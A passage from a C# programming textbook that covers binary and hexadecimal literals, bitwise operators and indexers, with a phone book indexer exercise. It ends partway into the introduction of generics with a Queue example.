public int NumSides { get; set; }
}
If the property is read-only, then initialize the property either in the object constructor or as the property is defined. For example:
class Circle
{
public DateTime CircleCreatedDate { get; }
= DateTime.Now;
...
}
Use properties to initialize an object
Specify the properties and their values as a list enclosed in braces when constructing the object. For example:
Triangle tri3 =
new Triangle { Side2Length = 12,
Side3Length = 17 };
CHAPTER 16
Handling binary data and using indexers
After completing this chapter, you will be able to:
Store and display integer data using binary and hexadecimal
representations.
Perform bitwise operations on binary data.
Encapsulate logical array-like access to an object by using indexers.
Control read access to indexers by declaring get accessors.
Control write access to indexers by declaring set accessors.
Create interfaces that declare indexers.
Implement indexers in structures and classes that inherit from
interfaces.
Chapter 15, “Implementing properties to access fields,” describes how to
implement and use properties as a means of providing controlled access to
the fields in a class. Properties are useful for mirroring fields that contain a
single value. However, indexers are invaluable if you want to provide access
to items that contain multiple values, and to do so by using a natural and
familiar syntax.
What is an indexer?
You can think of an indexer as a smart array, in much the same way that you
can think of a property as a smart field. Whereas a property encapsulates a
single value in a class, an indexer encapsulates a set of values. The syntax
that you use for an indexer is the same as the syntax that you use for an array.
The best way to understand indexers is to work through an example. First,
you’ll consider a problem and examine a solution that doesn’t use indexers.
Then you’ll work through the same problem and look at a better solution that
does use indexers. The problem concerns integers, or more precisely, the int
type. The example uses C# integers to store and query data stored as binary
data, so it helps to have an understanding of how you can use the integer
types in C# to store and manipulate binary values. We will discuss this first.
Storing binary values
You normally use an int to hold an integer value. Internally, an int stores its
value as a sequence of 32 bits, where each bit can be either 0 or 1. Most of
the time, you don’t care about this internal binary representation; you just use
an int type as a container that holds an integer value. Sometimes, however,
programmers use the int type for other purposes—some programs use an int
as a set of binary flags and manipulate the individual bits within an int. If you
are an old C hack like I am, what follows should have a very familiar feel.
Note Some older programs used int types to save memory. Such
programs typically date from when the size of computer memory was
measured in kilobytes rather than the gigabytes available these days,
and memory was at an absolute premium. A single int holds 32 bits,
each of which can be 1 or 0. In some cases, programmers assigned 1 to
indicate the value true and 0 to indicate false and then employed an int
as a set of Boolean values.
To make life a little easier for handling data that you want to treat as a
collection of binary values, C# enables you to specify integer constants using
binary notation. You indicate that a constant should be treated as a binary
representation by prefixing it with 0b. For example, the following code
assigns the binary value 1111 (15 in decimal) to a variable:
uint binData = 0b01111;
Note that this is a 4-bit value, but an integer occupies 32 bits; any bits not
specified are initialized to zero. You should also observe that when you
specify an integer as a binary value, it is good practice to store the result as an
unsigned int (uint). In fact, if you provide a full 32-bit binary value, the C#
compiler will insist that you use a uint.
To help cope with long strings of bits, you can also insert the “_”
character as a separator between blocks of digits, like this:
uint moreBinData = 0b0_11110000_01011010_11001100_00001111;
In this example, the “_” separator is used to mark the byte boundaries (32
bits is 4 bytes). You can use the “_” separator anywhere within a binary
constant (not just on byte boundaries); it is ignored by the C# compiler and is
provided simply to help improve the readability of your code.
If you find binary strings a little lengthy, you can opt to specify values
using hexadecimal (base 16) notation by using the 0x prefix. The following
two statements assign the same values shown in the previous example to
another pair of variables. Again, you can use the “_” character as a separator
to make the values easier to read:
uint hexData = 0x0_0F;
uint moreHexData = 0x0_F0_5A_CC_0F;
Displaying binary values
If you need to display the binary representation of an integer, you can use the
Convert.ToString method. Convert.ToString is a heavily overloaded method
that can generate a string representation of a range of data values held in
different types. If you are converting integer data, you can additionally
specify a numeric base (2, 8, 10, or 16), and the method will convert the
integer to that base using an algorithm a little like the exercises you have seen
in some earlier chapters. The following example prints out the binary value of
the moreHexData variable:
uint moreHexData = 0x0_F0_5A_CC_0F;
Console.WriteLine($"{Convert.ToString(moreHexData, 2)}");
// displays 11110000010110101100110000001111
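Passing 16 as the base displays the hexadecimal form instead. Here is a minimal sketch along the same lines (reusing the variable from the example above):

uint moreHexData = 0x0_F0_5A_CC_0F;
Console.WriteLine($"{Convert.ToString(moreHexData, 16)}");
// displays f05acc0f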
Manipulating binary values
C# provides a set of operators that you can use to access and manipulate the
individual bits in an uint. These operators are as follows:
The NOT (~) operator This is a unary operator that performs a bitwise
complement. For example, if you take the 8-bit value 0b0_11001100
(204 decimal) and apply the ~ operator to it, you obtain the result
0b0_00110011 (51 decimal); all the 1s in the original value become 0s,
and all the 0s become 1s.
Note The examples shown here are purely illustrative and are
accurate only to 8 bits. In C#, the int type is 32 bits, so if you try
any of these examples in a C# application, you will get a 32-bit
result that might be different from those shown in this list. For
example, in 32 bits, 204 is
0b0_00000000_00000000_00000000_11001100, so in C#, ~204 is
0b0_11111111_11111111_11111111_00110011 (which is
actually the int representation of –205 in C#).
The left-shift (<<) operator This is a binary operator that performs a
left shift. The 8-bit expression 204 << 2 returns the value 48. (In
binary, 204 decimal is 0b0_11001100, and shifting it left by two places
yields 0b0_00110000, or 48 decimal.) The far-left bits are discarded,
and zeros are introduced from the right. There is a corresponding right-
shift operator (>>).
The OR (|) operator This is a binary operator that performs a bitwise
OR operation, returning a value containing a 1 in each position in
which either of the operands has a 1. For example, the 8-bit expression
204 | 24 has the value 220 (204 is 0b0_11001100, 24 is 0b0_00011000,
and 220 is 0b0_11011100).
The AND (&) operator This operator performs a bitwise AND
operation. AND is similar to the bitwise OR operator, but it returns a
value containing a 1 in each position where both of the operands have a
1. So, the 8-bit expression 204 & 24 is 8 (204 is 0b0_11001100, 24 is
0b0_00011000, and 8 is 0b0_00001000).
The XOR (^) operator This operator performs a bitwise exclusive OR
operation, returning a 1 in each bit where there is a 1 in one operand or
the other but not both. (Two 1s yield a 0; this is the “exclusive” part of
the operator.) So the 8-bit expression 204 ^ 24 is 212 (0b0_11001100 ^
0b0_00011000 is 0b0_11010100).
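If you want to check these 8-bit results for yourself, the following short sketch (not part of the chapter's exercises) reproduces them; the & 0xFF mask keeps only the lowest 8 bits, because C# actually evaluates the expressions by using 32 bits:

uint value = 0b0_11001100;                // 204 decimal
Console.WriteLine(~value & 0xFF);         // 51  (bitwise NOT, masked to 8 bits)
Console.WriteLine((value << 2) & 0xFF);   // 48  (left shift by two places)
Console.WriteLine(value | 0b0_00011000);  // 220 (bitwise OR with 24)
Console.WriteLine(value & 0b0_00011000);  // 8   (bitwise AND with 24)
Console.WriteLine(value ^ 0b0_00011000);  // 212 (bitwise XOR with 24)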
You can use these operators together to determine the values of the
individual bits in an int. As an example, the following expression uses the
left-shift (<<) and bitwise AND (&) operators to determine whether the sixth
bit from the right of the int variable named bits is set to 0 or to 1:
(bits & (1 << 5)) != 0
Note The bitwise operators count the positions of bits from right to left,
and the bits are numbered starting at 0. So, bit 0 is the rightmost bit, and
the bit at position 5 is the bit six places from the right.
Suppose that the bits variable contains the decimal value 42. In binary,
this is 0b0_00101010. The decimal value 1 is 0b0_00000001 in binary, and
the expression 1 << 5 has the value 0b0_00100000; the sixth bit is 1. In
binary, the expression bits & (1 << 5) is 0b0_00101010 & 0b0_00100000,
and the value of this expression is 0b0_00100000, which is nonzero. If the
variable bits contains the value 65, or 0b0_01000001, the value of the
expression is 0b0_01000001 & 0b0_00100000, which yields the result
0b0_00000000, or zero.
This is a fairly complicated example, but it’s trivial in comparison to the
following expression, which uses the compound assignment operator &= to
set the bit at position 5 (the sixth bit from the right) to 0:
bits &= ~(1 << 5)
Similarly, if you want to set the bit at position 5 to 1, you can use the
bitwise OR (|) operator. The following complicated expression is based on
the compound assignment operator |=:
bits |= (1 << 5)
The trouble with these examples is that although they work, they are
fiendishly difficult to understand. They’re complicated, and the solution is a
very low-level one: it fails to create an abstraction of the problem that it
solves, and it is consequently very difficult to maintain code that performs
these kinds of operations.
Solving the same problems using indexers
Let’s pull back from the preceding low-level solution for a moment and
remember what the problem is. You’d like to use an int not as an int but as an
array of bits. Therefore, the best way to solve this problem is to use an int as
if it were an array of bits; in other words, what you’d like to be able to write
in order to access the bit six places from the right in the bits variable is an
expression such as the following (remember that arrays start with index 0):
bits[5]
And, to set the bit four places from the right to true, you’d like to be able
to write this:
bits[3] = true
Note To seasoned C developers, the Boolean value true is synonymous
with the binary value 1, and the Boolean value false is synonymous
with the binary value 0. Consequently, the expression bits[3] = true
means “Set the bit four places from the right of the bits variable to 1.”
Unfortunately, you can’t use the square bracket notation on an int; it
works only on an array or on a type that behaves like an array. So the solution
to the problem is to create a new type that acts like, feels like, and is used like
an array of bool variables but is implemented by using an int. You can
achieve this feat by defining an indexer. Let’s call this new type IntBits.
IntBits will contain an int value (initialized in its constructor), but the idea is
that you’ll use IntBits as an array of bool variables.
Tip The IntBits type is small and lightweight, so it makes sense to
create it as a structure rather than as a class.
struct IntBits
{
private int bits;
// Simple constructor, implemented as an expression-bodied method
public IntBits(int initialBitValue) => bits = initialBitValue;
// indexer to be written here
}
To define the indexer, you use a notation that is a cross between a
property and an array. You introduce the indexer with the this keyword,
specify the type of the value returned by the indexer, and also specify the
type of the value to use as the index into the indexer between square brackets.
The indexer for the IntBits struct uses an integer as its index type and returns
a Boolean value. It looks like this:
struct IntBits
{
...
    public bool this [ int index ]
    {
        get => (bits & (1 << index)) != 0;
        set
        {
            if (value) // turn the bit on if value is true; otherwise, turn it off
                bits |= (1 << index);
            else
                bits &= ~(1 << index);
        }
    }
}
Notice the following points:
An indexer is not a method; there are no parentheses containing a
parameter, but there are square brackets that specify an index. This
index is used to specify which element is being accessed.
All indexers use the this keyword. A class or structure can define at
most one indexer (although you can overload it and have several
implementations), and it is always named this.
Indexers contain get and set accessors just like properties. In this
example, the get and set accessors contain the complicated bitwise
expressions previously discussed.
The index specified in the indexer declaration is populated with the
index value specified when the indexer is called. The get and set
accessor methods can read this argument to determine which element
should be accessed.
Note You should perform a range check on the index value in the
indexer to prevent any unexpected exceptions from occurring in your
indexer code.
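For example, a more defensive version of the get accessor might guard the index like this (a sketch only; the exercise code shown above omits the check for brevity):

public bool this [ int index ]
{
    get
    {
        if (index < 0 || index > 31) // an int holds 32 bits, numbered 0 through 31
        {
            throw new ArgumentOutOfRangeException(nameof(index));
        }
        return (bits & (1 << index)) != 0;
    }
    ...
}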
It is also good practice to provide a way to display the data in this
structure. You can do this by overriding the ToString method and converting
the value held in the structure to a string containing its binary representation,
like this:
struct IntBits
{
...
public override string ToString()
{
return Convert.ToString(bits, 2);
}
}
After you have created the indexer, you can use a variable of type IntBits
instead of an int and apply the square bracket notation, as shown in the next
example:
int adapted = 0b0_01111110;
IntBits bits = new IntBits(adapted);
bool peek = bits[6]; // retrieve bool at index 6; should be true (1)
bits[0] = true; // set the bit at index 0 to true (1)
bits[3] = false; // set the bit at index 3 to false (0)
Console.WriteLine($"{bits}"); // displays 1110111 (0b0_01110111)
This syntax is certainly much easier to understand. It directly and
succinctly captures the essence of the problem.
Understanding indexer accessors
When you read an indexer, the compiler automatically translates your array-
like code into a call to the get accessor of that indexer. Consider the
following example:
bool peek = bits[6];
This statement is converted to a call to the get accessor for bits, and the
index argument is set to 6.
Similarly, if you write to an indexer, the compiler automatically translates
your array-like code into a call to the set accessor of that indexer, setting the
index argument to the value enclosed in the square brackets, such as
illustrated here:
bits[3] = true;
This statement is converted to a call to the set accessor for bits where
index is 3. As with ordinary properties, the data you are writing to the indexer
(in this case, true) is made available inside the set accessor by using the value
keyword. The type of value is the same as the type of the indexer itself (in
this case, bool).
It’s also possible to use an indexer in a combined read/write context. In
this case, both the get and set accessors are used. Look at the following
statement, which uses the XOR operator (^) to invert the value of the bit at
index 6 in the bits variable:
bits[6] ^= true;
This code is automatically translated into the following:
bits[6] = bits[6] ^ true;
This code works because the indexer declares both a get and a set
accessor.
Note You can declare an indexer that contains only a get accessor (a
read-only indexer) or only a set accessor (a write-only indexer).
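For example, a read-only variation of IntBits could omit the set accessor entirely (a sketch; the struct name here is illustrative):

struct ReadOnlyIntBits
{
    private int bits;
    public ReadOnlyIntBits(int initialBitValue) => bits = initialBitValue;

    // get accessor only: callers can read flags[i] but cannot assign to it
    public bool this [ int index ] => (bits & (1 << index)) != 0;
}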
Comparing indexers and arrays
When you use an indexer, the syntax is deliberately very array-like.
However, there are some important differences between indexers and arrays:
Indexers can use nonnumeric subscripts, such as a string (as shown in
the following example), whereas arrays can use only integer subscripts.
public int this [ string name ] { ... } // OK
Indexers can be overloaded (just like methods), whereas arrays cannot.
public Name this [ PhoneNumber number ] { ... }
public PhoneNumber this [ Name name ] { ... }
Indexers cannot be used as ref or out parameters, whereas array
elements can.
IntBits bits; // bits contains an indexer
Method(ref bits[1]); // compile-time error
Properties, arrays, and indexers
It is possible for a property to return an array, but remember that arrays
are reference types, so exposing an array as a property creates the
possibility of accidentally overwriting a lot of data. Look at the
following structure that exposes an array property named Data:
struct Wrapper
{
private int[] data;
...
public int[] Data
{
get => this.data;
set => this.data = value;
}
}
Now consider the following code that uses this property:
Wrapper wrap = new Wrapper();
...
int[] myData = wrap.Data;
myData[0]++;
myData[1]++;
This looks pretty innocuous. However, because arrays are reference
types, the variable myData refers to the same object as the private data
variable in the Wrapper structure. Any changes you make to elements in
myData are made to the data array; the expression myData[0]++ has
the very same effect as data[0]++. If this is not your intention, you
should use the Clone method in the get and set accessors of the Data
property to return a copy of the data array, or make a copy of the value
being set, as shown in the code that follows. (Chapter 8, “Understanding
values and references,” discusses the Clone method for copying arrays.)
Notice that the Clone method returns an object, which you must cast to
an integer array.
struct Wrapper
{
private int[] data;
...
public int[] Data
{
get { return this.data.Clone() as int[]; }
set { this.data = value.Clone() as int[]; }
}
}
However, this approach can become very messy and expensive in
terms of memory use. Indexers provide a natural solution to this
problem—don’t expose the entire array as a property; just make its
individual elements available through an indexer:
struct Wrapper
{
private int[] data;
...
public int this [int i]
{
get => this.data[i];
set => this.data[i] = value;
}
}
The following code uses the indexer in a similar manner to the
property shown earlier:
Wrapper wrap = new Wrapper();
...
int[] myData = new int[2];
myData[0] = wrap[0];
myData[1] = wrap[1];
myData[0]++;
myData[1]++;
This time, incrementing the values in the myData array has no effect
on the original array in the Wrapper object. If you really want to modify
the data in the Wrapper object, you must write statements such as this:
wrap[0]++;
This is much clearer and safer!
Indexers in interfaces
You can declare indexers in an interface. To do this, specify the get keyword,
the set keyword, or both, but replace the body of the get or set accessor with a
semicolon. Any class or structure that implements the interface must
implement the indexer accessors declared in the interface, as demonstrated
here:
interface IRawInt
{
bool this [ int index ] { get; set; }
}
struct RawInt : IRawInt
{
...
public bool this [ int index ]
{
get { ... }
set { ... }
}
...
}
If you implement the interface indexer in a class, you can declare the
indexer implementations as virtual. This allows further derived classes to
override the get and set accessors, such as in the following:
class RawInt : IRawInt
{
...
public virtual bool this [ int index ]
{
get { ... }
set { ... }
}
...
}
You can also choose to implement an indexer by using the explicit
interface implementation syntax covered in Chapter 13, “Creating interfaces
and defining abstract classes.” An explicit implementation of an indexer is
nonpublic and nonvirtual (and so cannot be overridden), as shown in this
example:
struct RawInt : IRawInt
{
...
bool IRawInt.this [ int index ]
{
get { ... }
set { ... }
}
...
}
Using indexers in a Windows application
In the following exercise, you will examine a simple phone book application
and complete its implementation. You will write two indexers in the
PhoneBook class: one that accepts a Name parameter and returns a
PhoneNumber, and another that accepts a PhoneNumber parameter and
returns a Name. (The Name and PhoneNumber structures have already been
written.) You will also need to call these indexers from the correct places in
the program.
Familiarize yourself with the application
1. Start Microsoft Visual Studio 2017 if it is not already running.
2. Open the Indexers solution, which is located in the \Microsoft
Press\VCSBS\Chapter 16\Indexers folder in your Documents folder.
With this graphical application, a user can search for the telephone
number for a contact, and also find the name of a contact that matches a
given telephone number.
3. On the Debug menu, click Start Debugging.
The project builds and runs. A form appears, displaying two empty text
boxes labeled Name and Phone Number. The form initially displays two
buttons: one to find a phone number when given a name, and one to find
a name when given a phone number. Expanding the command bar at the
bottom of the form reveals an additional Add button that will add a
name/phone number pair to a list of names and phone numbers held by
the application. All buttons (including the Add button in the command
bar) currently do nothing. The application looks like this:
Your task is to complete the application so that the buttons work.
4. Return to Visual Studio 2017 and stop debugging.
5. Display the Name.cs file for the Indexers project in the Code and Text
Editor window. Examine the Name structure. Its purpose is to act as a
holder for names.
The name is provided as a string to the constructor. The name can be
retrieved by using the read-only string property named Text. (The
Equals and GetHashCode methods are used for comparing Names when
searching through an array of Name values—you can ignore them for
now.)
6. Display the PhoneNumber.cs file in the Code and Text Editor window,
and examine the PhoneNumber structure. It is similar to the Name
structure.
7. Display the PhoneBook.cs file in the Code and Text Editor window and
examine the PhoneBook class.
This class contains two private arrays: an array of Name values called
names, and an array of PhoneNumber values called phoneNumbers. The
PhoneBook class also contains an Add method that adds a phone number
and name to the phone book. This method is called when the user clicks
the Add button on the form. The enlargeIfFull method is called by Add
to check whether the arrays are full when the user adds another entry.
This method creates two new, bigger arrays, copies the contents of the
existing arrays to them, and then discards the old arrays.
The Add method is deliberately kept simple and does not check whether
a name or phone number has already been added to the phone book.
The PhoneBook class does not currently provide any functionality with
which a user can find a name or telephone number; you will add two
indexers to provide this facility in the next exercise.
Write the indexers
1. In the PhoneBook.cs file, delete the comment // TODO: write 1st
indexer here and replace it with a public read-only indexer for the
PhoneBook class, as shown in bold in the code that follows. The indexer
should return a Name and take a PhoneNumber item as its index. Leave
the body of the get accessor blank.
The indexer should look like this:
sealed class PhoneBook
{
...
public Name this[PhoneNumber number]
{
get
{
}
}
...
}
2. Implement the get accessor as shown in bold in the code that follows.
The purpose of the accessor is to find the name that matches the
specified phone number. To do this, you need to call the static IndexOf
method of the Array class. The IndexOf method performs a search
through an array, returning the index of the first item in the array that
matches the specified value. The first argument to IndexOf is the array to
search through (phoneNumbers). The second argument to IndexOf is the
item for which you are searching. IndexOf returns the integer index of
the element if it finds it; otherwise, IndexOf returns –1. If the indexer
finds the phone number, it should return the corresponding name.
Otherwise, it should return an empty Name value. (Note that Name is a
structure, so the default constructor sets its private name field to null.)
sealed class PhoneBook
{
...
public Name this [PhoneNumber number]
{
get
{
int i = Array.IndexOf(this.phoneNumbers, number);
if (i != -1)
{
return this.names[i];
}
else
{
return new Name();
}
}
}
...
}
3. Remove the comment // TODO: write 2nd indexer here and replace it
with a second public read-only indexer for the PhoneBook class that
returns a PhoneNumber and accepts a single Name parameter.
Implement this indexer in the same way as the first one, as shown in
bold in the code that follows. (Again, note that PhoneNumber is a
structure and therefore always has a default constructor.)
The second indexer should look like this:
sealed class PhoneBook
{
...
public PhoneNumber this [Name name]
{
get
{
int i = Array.IndexOf(this.names, name);
if (i != -1)
{
return this.phoneNumbers[i];
}
else
{
return new PhoneNumber();
}
}
}
...
}
Notice that these overloaded indexers can coexist because the values
that they index are of different types, which means that their signatures
are different. If the Name and PhoneNumber structures were replaced by
simple strings (which they wrap), the overloads would have the same
signature, and the class would not compile.
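A quick sketch illustrates the clash (the class is hypothetical, purely for demonstration):

sealed class BadPhoneBook
{
    public string this [ string name ] { get { return "..."; } }

    // Will not compile if uncommented: this indexer has the same
    // signature as the one above (a single string parameter).
    // public string this [ string number ] { get { return "..."; } }
}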
4. On the Build menu, click Build Solution, correct any syntax errors, and
then rebuild the solution if necessary.
Call the indexers
1. Display the MainPage.xaml.cs file in the Code and Text Editor window
and then locate the findByNameClick method.
This method is called when the Find By Name button is clicked. This
method is currently empty. Replace the // TODO: comment with the
code shown in bold in the example that follows. This code performs
these tasks:
a. Reads the value of the Text property from the name text box on the
form. This is a string containing the contact name that the user has
typed in.
b. If the string is not empty, the code searches for the phone number
corresponding to that name in the PhoneBook by using the indexer.
(Notice that the MainPage class contains a private PhoneBook field
named phoneBook.) It constructs a Name object from the string, and
passes it as the parameter to the PhoneBook indexer.
c. If the Text property of the PhoneNumber structure returned by the
indexer is not null or empty, the code writes the value of this property
to the phoneNumber text box on the form; otherwise, it displays the
text “Not Found.”
The completed findByNameClick method should look like this:
private void findByNameClick(object sender, RoutedEventArgs e)
{
string text = name.Text;
if (!String.IsNullOrEmpty(text))
{
Name personsName = new Name(text);
PhoneNumber personsPhoneNumber =
this.phoneBook[personsName];
phoneNumber.Text =
String.IsNullOrEmpty(personsPhoneNumber.Text) ?
"Not Found" : personsPhoneNumber.Text;
}
}
Other than the statement that accesses the indexer, there are two further
points of interest in this code:
The static String method IsNullOrEmpty is used to determine
whether a string is empty or contains a null value. This is the
preferred method for testing whether a string contains a value. It
returns true if the string contains a null value or it is an empty
string; otherwise, it returns false.
The ? : operator used by the statement that populates the Text
property of the phoneNumber text box on the form. Remember
that this operator acts like an inline if…else statement for an
expression. In the preceding code, if the expression
String.IsNullOrEmpty(personsPhoneNumber.Text) is true, no
matching entry was found in the phone book and the text “Not
Found” is displayed on the form; otherwise, the value held in the
Text property of the personsPhoneNumber variable is displayed.
2. Locate the findByPhoneNumberClick method in the MainPage.xaml.cs
file. It is below the findByNameClick method.
The findByPhoneNumberClick method is called when the Find By
Phone Number button is clicked. This method is currently empty apart
from a // TODO: comment. You need to implement it as follows (the
completed code is shown in bold in the example that follows):
a. Read the value of the Text property from the phoneNumber box on the
form. This is a string containing the phone number that the user has
typed.
b. If the string is not empty, use the indexer to search for the name
corresponding to that phone number in the PhoneBook.
c. Write the Text property of the Name structure returned by the indexer
to the name box on the form.
The completed method should look like this:
private void findByPhoneNumberClick(object sender,
RoutedEventArgs e)
{
string text = phoneNumber.Text;
if (!String.IsNullOrEmpty(text))
{
PhoneNumber personsPhoneNumber = new PhoneNumber(text);
Name personsName = this.phoneBook[personsPhoneNumber];
name.Text = String.IsNullOrEmpty(personsName.Text) ?
"Not Found" : personsName.Text;
}
}
3. On the Build menu, click Build Solution, and then correct any errors that
occur.
Test the application
1. On the Debug menu, click Start Debugging.
2. Type your name and phone number in the appropriate boxes, and then
expand the command bar and click Add. (You can expand the command
bar by clicking the ellipsis.)
When you click the Add button, the Add method stores the information
in the phone book and clears the text boxes so that they are ready to
perform a search.
3. Repeat step 2 several times with some different names and phone
numbers so that the phone book contains a selection of entries. Note that
the application performs no checking of the names and telephone
numbers that you enter, and you can input the same name and telephone
number more than once. For the purposes of this demonstration, to avoid
confusion, be sure that you provide different names and telephone
numbers.
4. Type a name that you used in step 3 into the Name box, and then click
Find By Name.
The phone number you added for this contact in step 3 is retrieved from
the phone book and is displayed in the Phone Number text box.
5. Type a phone number for a different contact in the Phone Number box,
and then click Find By Phone Number.
The contact name is retrieved from the phone book and is displayed in
the Name box.
6. Type a name that you did not enter in the phone book into the Name
box, and then click Find By Name.
This time, the Phone Number box displays the message “Not Found.”
7. Close the form, and return to Visual Studio 2017.
Summary
In this chapter, you saw how to use indexers to provide array-like access to
data in a class. You learned how to create indexers that can take an index and
return the corresponding value by using logic defined by the get accessor, and
you saw how to use the set accessor with an index to populate a value in an
indexer.
If you want to continue to the next chapter, keep Visual Studio 2017
running and turn to Chapter 17, “Introducing generics.”
If you want to exit Visual Studio 2017 now, on the File menu, click
Exit. If you see a Save dialog box, click Yes and save the project.
Quick reference

To specify an integer value using binary or hexadecimal notation: Use the 0b (for binary values) or 0x (for hexadecimal values) prefix. Include "_" separators to make values easier to read. For example:

uint moreBinData = 0b0_11110000_01011010_11001100_00001111;
uint moreHexData = 0x0_F0_5A_CC_0F;

To display an integer value as its binary or hexadecimal representation: Use the Convert.ToString method, and specify 2 (for binary) or 16 (for hexadecimal) as the number base. For example:

uint moreHexData = 0x0_F0_5A_CC_0F;
Console.WriteLine($"{Convert.ToString(moreHexData, 2)}");
// displays 11110000010110101100110000001111

To create an indexer for a class or structure: Declare the type of the indexer, followed by the keyword this, and then the indexer arguments in square brackets. The body of the indexer can contain a get and/or set accessor. For example:

struct RawInt
{
    ...
    public bool this [ int index ]
    {
        get { ... }
        set { ... }
    }
    ...
}

To define an indexer in an interface: Define an indexer with the get and/or set keywords. For example:

interface IRawInt
{
    bool this [ int index ] { get; set; }
}

To implement an interface indexer in a class or structure: In the class or structure that implements the interface, define the indexer and implement the accessors. For example:

struct RawInt : IRawInt
{
    ...
    public bool this [ int index ]
    {
        get { ... }
        set { ... }
    }
    ...
}

To implement an indexer defined by an interface by using explicit interface implementation in a class or structure: In the class or structure that implements the interface, specify the interface but do not specify the indexer accessibility. For example:

struct RawInt : IRawInt
{
    ...
    bool IRawInt.this [ int index ]
    {
        get { ... }
        set { ... }
    }
    ...
}
CHAPTER 17
Introducing generics
After completing this chapter, you will be able to:
Explain the purpose of generics.
Define a type-safe class by using generics.
Create instances of a generic class based on types specified as type
parameters.
Implement a generic interface.
Define a generic method that implements an algorithm independent of
the type of data on which it operates.
Chapter 8, “Understanding values and references,” shows you how to use
the object type to refer to an instance of any class. You can use the object
type to store a value of any type, and you can define parameters by using the
object type when you need to pass values of any type into a method. A
method can also return values of any type by specifying object as the return
type. Although this practice is very flexible, it puts the onus on the
programmer to remember what sort of data is actually being used. This can
lead to run-time errors if the programmer makes a mistake. In this chapter,
you will learn about generics, a feature that has been designed to help you
prevent this kind of mistake.
The problem: Misusing the object type
To understand generics, it is worth looking in detail at the problem they are
designed to solve.
Suppose that you need to model a first-in, first-out structure such as a
queue. You could create a class such as the following:
class Queue
{
private const int DEFAULTQUEUESIZE = 100;
private int[] data;
private int head = 0, tail = 0;
private int numElements = 0;
public Queue()
{
this.data = new int[DEFAULTQUEUESIZE];
}
public Queue(int size)
{
if (size > 0)
{
this.data = new int[size];
}
else
{
throw new ArgumentOutOfRangeException("size", "Must be greater than zero");
}
}
public void Enqueue(int item)
{
if (this.numElements == this.data.Length)
{
throw new Exception("Queue full");
}
this.data[this.head] = item;
this.head++;
this.head %= this.data.Length;
this.numElements++;
}
public int Dequeue()
{
if (this.numElements == 0)
{
throw new Exception("Queue empty");
}
int queueItem = this.data[this.tail];
this.tail++;
this.tail %= this.data.Length;
this.numElements--;
return queueItem;
}
}
This class uses an array to provide a circular buffer for holding the data.
The size of this array is specified by the constructor. An application uses the
Enqueue method to add an item to the queue and the Dequeue method to pull
an item from the queue. The private head and tail fields keep track of where
to insert an item into the array and where to retrieve an item from the array.
The numElements field indicates how many items are in the array. The
Enqueue and Dequeue methods use these fields to determine where to store
or retrieve an item and perform some rudimentary error checking. An
application can create a Queue object and call these methods, as shown in the
code example that follows. Notice that the items are dequeued in the same
order in which they are enqueued:
Queue queue = new Queue(); // Create a new Queue
queue.Enqueue(100);
queue.Enqueue(-25);
queue.Enqueue(33);
Console.WriteLine($"{queue.Dequeue()}"); // Displays 100
Console.WriteLine($"{queue.Dequeue()}"); // Displays -25
Console.WriteLine($"{queue.Dequeue()}"); // Displays 33
Now, the Queue class works well for queues of ints, but what if you want
to create queues of strings, or floats, or even queues of more complex types
such as Circle (see Chapter 7, “Creating and managing classes and objects”),
or Horse or Whale (see Chapter 12, “Working with inheritance”)? The
problem is that the way in which the Queue class is implemented restricts it
to items of type int, and if you try to enqueue a Horse, you will get a
compile-time error.
Queue queue = new Queue();
Horse myHorse = new Horse();
queue.Enqueue(myHorse); // Compile-time error: Cannot convert from Horse to int
One way around this restriction is to specify that the array in the Queue
class contains items of type object, update the constructors, and modify the
Enqueue and Dequeue methods to take an object parameter and return an
object, such as in the following:
class Queue
{
...
private object[] data;
...
public Queue()
{
this.data = new object[DEFAULTQUEUESIZE];
}
public Queue(int size)
{
...
this.data = new object[size];
...
}
public void Enqueue(object item)
{
...
}
public object Dequeue()
{
...
object queueItem = this.data[this.tail];
...
return queueItem;
}
}
Remember that you can use the object type to refer to a value or variable
of any type. All reference types automatically inherit (either directly or
indirectly) from the System.Object class in the Microsoft .NET Framework
(in C#, object is an alias for System.Object). Now, because the Enqueue and
Dequeue methods manipulate objects, you can operate on queues of Circles,
Horses, Whales, or any of the other classes that you have seen earlier in this
book. However, it is important to notice that you have to cast the value
returned by the Dequeue method to the appropriate type because the compiler
will not perform the conversion from the object type automatically.
Queue queue = new Queue();
Horse myHorse = new Horse();
queue.Enqueue(myHorse); // Now legal – Horse is an object
...
Horse dequeuedHorse = (Horse)queue.Dequeue(); // Need to cast object back to a Horse
If you don’t cast the returned value, you will get the compiler error
“Cannot implicitly convert type ‘object’ to ‘Horse.’” This requirement to
perform an explicit cast negates much of the flexibility afforded by the
object type. Furthermore, it is very easy to write code such as this:
Queue queue = new Queue();
Horse myHorse = new Horse();
queue.Enqueue(myHorse);
...
Circle myCircle = (Circle)queue.Dequeue(); // run-time error
Although this code will compile, it is not valid and throws a
System.InvalidCastException exception at runtime. The error is caused by
trying to store a reference to a Horse in a Circle variable when it is dequeued,
and the two types are not compatible. This error is not spotted until runtime
because the compiler does not have enough information to perform this check
at compile time. The real type of the object being dequeued becomes
apparent only when the code runs.
Another disadvantage of using the object approach to create generalized
classes and methods is that it can consume additional memory and processor
time if the runtime needs to convert an object to a value type and back again.
Consider the following piece of code that manipulates a queue of int values:
Queue queue = new Queue();
int myInt = 99;
queue.Enqueue(myInt); // box the int to an object
...
myInt = (int)queue.Dequeue(); // unbox the object to an int
The Queue data type expects the items it holds to be objects, and object is
a reference type. Enqueueing a value type, such as an int, requires it to be
boxed to convert it to a reference type. Similarly, dequeueing into an int
requires the item to be unboxed to convert it back to a value type. (See the
sections “Boxing” and “Unboxing” in Chapter 8 for more details.) Although
boxing and unboxing happen transparently, they add performance overhead
because they involve dynamic memory allocations. This overhead is small for
each item, but it adds up when a program creates queues of large numbers of
value types.
The generics solution
C# provides generics to remove the need for casting, improve type safety,
reduce the amount of boxing required, and make it easier to create
generalized classes and methods. Generic classes and methods accept type
parameters, which specify the types of objects on which they operate. In C#,
you indicate that a class is a generic class by providing a type parameter in
angle brackets, like this:
class Queue<T>
{
...
}
The T in this example acts as a placeholder for a real type at compile time.
When you write code to instantiate a generic Queue, you provide the type
that should be substituted for T (Circle, Horse, int, and so on). When you
define the fields and methods in the class, you use this same placeholder to
indicate the type of these items, like this:
class Queue<T>
{
    ...
    private T[] data; // array is of type 'T', where 'T' is the type parameter
    ...
    public Queue()
    {
        this.data = new T[DEFAULTQUEUESIZE]; // use 'T' as the data type
    }
    public Queue(int size)
    {
        ...
        this.data = new T[size];
        ...
    }
    public void Enqueue(T item) // use 'T' as the type of the method parameter
    {
        ...
    }
